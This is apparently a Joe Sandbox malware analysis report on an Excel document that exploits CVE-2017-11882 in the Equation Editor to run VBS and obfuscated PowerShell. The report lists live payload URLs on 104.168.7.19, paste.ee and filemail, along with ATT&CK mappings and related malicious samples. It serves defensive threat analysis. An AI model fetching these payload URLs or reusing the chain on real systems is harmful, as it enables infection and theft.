        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information211
        Scripting        		Valid Accounts121
        Command and Scripting Interpreter        		211
        Scripting        		111
        Process Injection        		1
        Masquerading        		OS Credential Dumping1
        Security Software Discovery        		Remote ServicesData from Local System1
        Web Service        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts43
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Modify Registry        		LSASS Memory1
        Process Discovery        		Remote Desktop ProtocolData from Removable Media1
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts3
        PowerShell        		Logon Script (Windows)Logon Script (Windows)21
        Virtualization/Sandbox Evasion        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive24
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets1
        Remote System Discovery        		SSHKeylogging14
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Obfuscated Files or Information        		Cached Domain Credentials1
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Install Root Certificate        		DCSync13
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1568171 Sample: fUHl7rElXU.xlsx Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus / Scanner detection for submitted sample 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 17 other signatures 2->49 9 EXCEL.EXE 6 9 2->9         started        process3 file4 27 C:\Users\user\Desktop\~$fUHl7rElXU.xlsx, data 9->27 dropped 12 EQNEDT32.EXE 12 9->12         started        process5 dnsIp6 41 104.168.7.19, 49163, 80 AS-COLOCROSSINGUS United States 12->41 29 C:\...\eveningmecccmedicallaboratory.vbs, Unicode 12->29 dropped 31 C:\Users\...\webmadamMPDW-constraints[1].vbs, Unicode 12->31 dropped 65 Office equation editor establishes network connection 12->65 67 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->67 17 wscript.exe 1 12->17         started        file7 signatures8 process9 dnsIp10 33 paste.ee 17->33 35 paste.ee 188.114.97.6, 443, 49164, 49165 CLOUDFLARENETUS European Union 17->35 51 System process connects to network (likely due to code injection or exploit) 17->51 53 Suspicious powershell command line found 17->53 55 Wscript starts Powershell (via cmd or directly) 17->55 59 4 other signatures 17->59 21 powershell.exe 4 17->21         started        signatures11 57 Connects to a pastebin service (likely for C&C) 33->57 process12 signatures13 61 Suspicious powershell command line found 21->61 63 Obfuscated command line found 21->63 24 powershell.exe 12 5 21->24         started        process14 dnsIp15 37 ip.1017.filemail.com 142.215.209.78, 443, 49166 HUMBER-COLLEGECA Canada 24->37 39 1017.filemail.com 24->39

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        fUHl7rElXU.xlsx71%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
        fUHl7rElXU.xlsx100%AviraEXP/CVE-2017-11882.Gen

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://104.168.7.19/webmadamMPDW-constraints.vbs0%Avira URL Cloudsafe
        http://104.168.7.19/webmadamMPDW-constraints.vbsj0%Avira URL Cloudsafe
        https://1017.filemail.com/api/fi0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        paste.ee
        		188.114.97.6
        		truefalse
          		high
          ip.1017.filemail.com
          		142.215.209.78
          		truefalse
            		high
            1017.filemail.com
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://104.168.7.19/webmadamMPDW-constraints.vbstrue
              • Avira URL Cloud: safe
              		unknown
              https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904ffalse
                		high
                https://paste.ee/d/OARvmfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6Spowershell.exe, 00000008.00000002.493847190.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DA3000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.494452384.0000000003599000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.entrust.net/server1.crl0wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://ocsp.entrust.net03wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 00000008.00000002.494452384.0000000003599000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.google.com;wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://104.168.7.19/webmadamMPDW-constraints.vbsjEQNEDT32.EXE, 00000002.00000002.472170198.00000000035A0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.494452384.0000000003599000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://1017.filemail.compowershell.exe, 00000008.00000002.493847190.00000000026AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://1017.filemail.com/api/fipowershell.exe, 00000008.00000002.494613112.0000000004D60000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://analytics.paste.eewscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://paste.ee/d/OARvmwscript.exe, 00000005.00000003.482584084.000000000081D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482501010.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.485062937.000000000081F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://go.microspowershell.exe, 00000008.00000002.493847190.0000000002AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.comwscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/powershell.exe, 00000008.00000002.494452384.0000000003599000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.494452384.0000000003599000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://analytics.paste.ee;wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdnjs.cloudflare.comwscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdnjs.cloudflare.com;wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ocsp.entrust.net0Dwscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.496961599.0000000002571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.493847190.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://secure.comodo.com/CPS0wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://secure.gravatar.comwscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://themes.googleusercontent.comwscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.entrust.net/2048ca.crl0wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://paste.ee/d/OARvmzwscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        142.215.209.78
                                                                        		ip.1017.filemail.comCanada
                                                                        		32156HUMBER-COLLEGECAfalse
                                                                        188.114.97.6
                                                                        		paste.eeEuropean Union
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        104.168.7.19
                                                                        		unknownUnited States
                                                                        		36352AS-COLOCROSSINGUStrue

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1568171
                                                                        Start date and time:2024-12-04 12:19:12 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 5m 7s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                        Number of analysed new started processes analysed:11
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:fUHl7rElXU.xlsx
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:b95a8f60a0db34e77e88eee9fc34f2f057f31f9eb1bc66fa292cbe7e5e697428.xlsx
                                                                        Detection:MAL
                                                                        Classification:mal100.spre.troj.expl.evad.winXLSX@8/10@5/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 33.3%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 24
                                                                        • Number of non-executed functions: 16
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .xlsx
                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                        • Attach to Office via COM
                                                                        • Active ActiveX Object
                                                                        • Scroll down
                                                                        • Close Viewer

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                        • Execution Graph export aborted for target powershell.exe, PID 3660 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 3768 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: fUHl7rElXU.xlsx

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        06:20:57API Interceptor54x Sleep call for process: EQNEDT32.EXE modified
                                                                        06:21:00API Interceptor47x Sleep call for process: wscript.exe modified
                                                                        06:21:05API Interceptor58x Sleep call for process: powershell.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        142.215.209.78geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                          QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                            Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                              segura.vbsGet hashmaliciousRemcosBrowse
                                                                                asegurar.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                  solicitud de cotizaci#U00f3n..09.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                    PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                                                      LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                        seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                          pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                            188.114.97.6ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                                                            • orbitdownloader.com/
                                                                                            ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                                                            • orbitdownloader.com/
                                                                                            INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                            ZciowjM9hN.exeGet hashmaliciousLokibotBrowse
                                                                                            • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                                                                            104.168.7.19solicitud de cotizaci#U00f3n..09.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • meatniggabella.duckdns.org/fridaynightMPDW-constraints.vbs
                                                                                            transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.168.7.19/madamwebbxxxx644.txt

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            ip.1017.filemail.comgeHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                            • 142.215.209.78
                                                                                            QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 142.215.209.78
                                                                                            Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 142.215.209.78
                                                                                            segura.vbsGet hashmaliciousRemcosBrowse
                                                                                            • 142.215.209.78
                                                                                            asegurar.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                            • 142.215.209.78
                                                                                            solicitud de cotizaci#U00f3n..09.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 142.215.209.78
                                                                                            PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                                                            • 142.215.209.78
                                                                                            LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                            • 142.215.209.78
                                                                                            seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                            • 142.215.209.78
                                                                                            pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                            • 142.215.209.78
                                                                                            paste.eeOrder_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                            • 104.21.84.67
                                                                                            nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                            • 104.21.84.67
                                                                                            1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                            • 104.21.84.67
                                                                                            1013911.jsGet hashmaliciousFormBookBrowse
                                                                                            • 104.21.84.67
                                                                                            asegurar.vbsGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.84.67
                                                                                            geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.187.200
                                                                                            Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.21.84.67
                                                                                            MT103-8819006.DOCS.vbsGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.187.200
                                                                                            Rooming list.jsGet hashmaliciousRemcosBrowse
                                                                                            • 104.21.84.67
                                                                                            segura.vbsGet hashmaliciousRemcosBrowse
                                                                                            • 172.67.187.200

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            HUMBER-COLLEGECAseemebestgoodluckthings.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                            • 142.215.209.77
                                                                                            seemebestthingsgivenmegood.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                            • 142.215.209.77
                                                                                            PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                            • 142.215.209.77
                                                                                            PO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                            • 142.215.209.77
                                                                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                            • 142.215.209.77
                                                                                            Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                            • 142.215.209.77
                                                                                            https://www.filemail.com/d/dolcahmytquddazGet hashmaliciousUnknownBrowse
                                                                                            • 142.215.209.74
                                                                                            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                            • 142.214.116.218
                                                                                            geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                            • 142.215.209.78
                                                                                            QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 142.215.209.78
                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 104.21.16.9
                                                                                            letter_olivia.law_mercerhole.co.uk.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 172.67.149.151
                                                                                            Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                            • 104.21.84.67
                                                                                            Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.67.152
                                                                                            https://u48081970.ct.sendgrid.net/ls/click?upn=u001.vNxnXXzC2QsasPA6W6ADpt-2Ftorlqu4ypy1cx618BO406CuTHe6Rdpmm4JfxhQmns-2B9IcSpgwJrNHXYfa1uXDUgS9xVKd9ZaAsws4zk7muCg-3DZZr1_86mcl1dEDC9SsRn0J-2B7n6xG4PLWb-2FVElhDs9zkYSfOVUWEBOuIAwgb9WpkpxhmyQMvzh9Kpdo3GVQ9nn-2BdarUcw1Be1RgOuXLzqHPNUHTd4mWAin5j-2BbK5LI9vw-2FwoT4CfXbn2rvr5PC14V-2BoEesvL2IwUpGrOwfyzirkerYq8Bbu6UXfMYK8JypQJLQFTzv9qOKM9xwxbsZEsN-2FS8c7yPpSVyD4JV6Ez1fwyruBZbRT67v2slyMK0dybL01-2FqY1O3quC8MNfOL54dEjEjjjtBhtF8l6gl-2BFk97-2FcagJqrRH-2BP4AOzpSTLN8aGjPkIeZfkWYhxIDr2ShdgJYfmFjbRrp6vD-2BEA0P1tDuf4k2w8KcMQsSCFCuO-2BSnL609Wz8y8d8IiJB-2BVOZstmbWmLPRVsjdic3dco790-2BndBO7DIhPAMWasm-2BSuMUmmKOVREaHHO1TmBLay3m-2Fqnd5qCadiu5n-2BBlTPeuRSd8m6Tx8Sj3LjxuSOmm0dIJIeP096RcuawY-2Bwm35dxyKgk9lwZ2FL0G9hMwSeHpWOjTqpbJ6cwnE0Nv6qjBSfLUN9pmUsuyjY22-2BPk-2Bu2QeCEIGZJeMC2mHR4iXU1Qd68tL0Wn-2BzNpsZPJKME2mpPl5RPmepvjIPYDYzLppde1eyHOjjkxp-2B6BOc-2FRZoyOwKNazhxqqEDxsmGEjLPPvZqanPzaTyGLfYcN0Kc4jZf6lBDAt02aCwmH2QRoGIW7S6jsbtrjJTjOztrvCHISe02saguqYwC4HGC2M60hhERSXlfzGrn5fBrmeO2Z-2BnVPO-2BGSOD-2FR1GgZXWRHW1IcKsHxaS0BjTdT4JTEvq3q-2B2Me7kitfPPju2fy0BbVh1w1AsRRqxG98UgBhZKMLhRZ9ju7VnLLYoEC6281aKRZYKi84zlwZdKcDlGWdCJDSLVukCfyYJScludzZM-3DGet hashmaliciousUnknownBrowse
                                                                                            • 104.16.123.96
                                                                                            https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402Get hashmaliciousUnknownBrowse
                                                                                            • 104.17.25.14
                                                                                            Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.emlGet hashmaliciousUnknownBrowse
                                                                                            • 104.18.86.42
                                                                                            https://jxgy-zcmp.maillist-manage.eu/click/1315cead38f4e738/1315cead38f50cecGet hashmaliciousUnknownBrowse
                                                                                            • 172.64.144.254
                                                                                            MicrosoftScript.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                            • 172.67.19.24
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 104.21.16.9
                                                                                            AS-COLOCROSSINGUSboatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                            • 198.23.133.131
                                                                                            boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                            • 198.23.133.131
                                                                                            boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                            • 198.23.133.131
                                                                                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                            • 198.23.133.131
                                                                                            boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 198.23.133.131
                                                                                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                            • 198.23.133.131
                                                                                            boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 198.23.133.131
                                                                                            boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                                            • 198.23.133.131
                                                                                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                            • 198.23.133.131
                                                                                            xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                            • 198.12.122.185

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            05af1f5ca1b87cc9cc9b25185115607dAmoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                                                                                            • 142.215.209.78
                                                                                            • 188.114.97.6
                                                                                            #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                            • 142.215.209.78
                                                                                            • 188.114.97.6
                                                                                            6PAuIAUnwm.docGet hashmaliciousUnknownBrowse
                                                                                            • 142.215.209.78
                                                                                            • 188.114.97.6
                                                                                            n19xU1hV2t.docGet hashmaliciousUnknownBrowse
                                                                                            • 142.215.209.78
                                                                                            • 188.114.97.6
                                                                                            LBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                                            • 142.215.209.78
                                                                                            • 188.114.97.6
                                                                                            2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 142.215.209.78
                                                                                            • 188.114.97.6
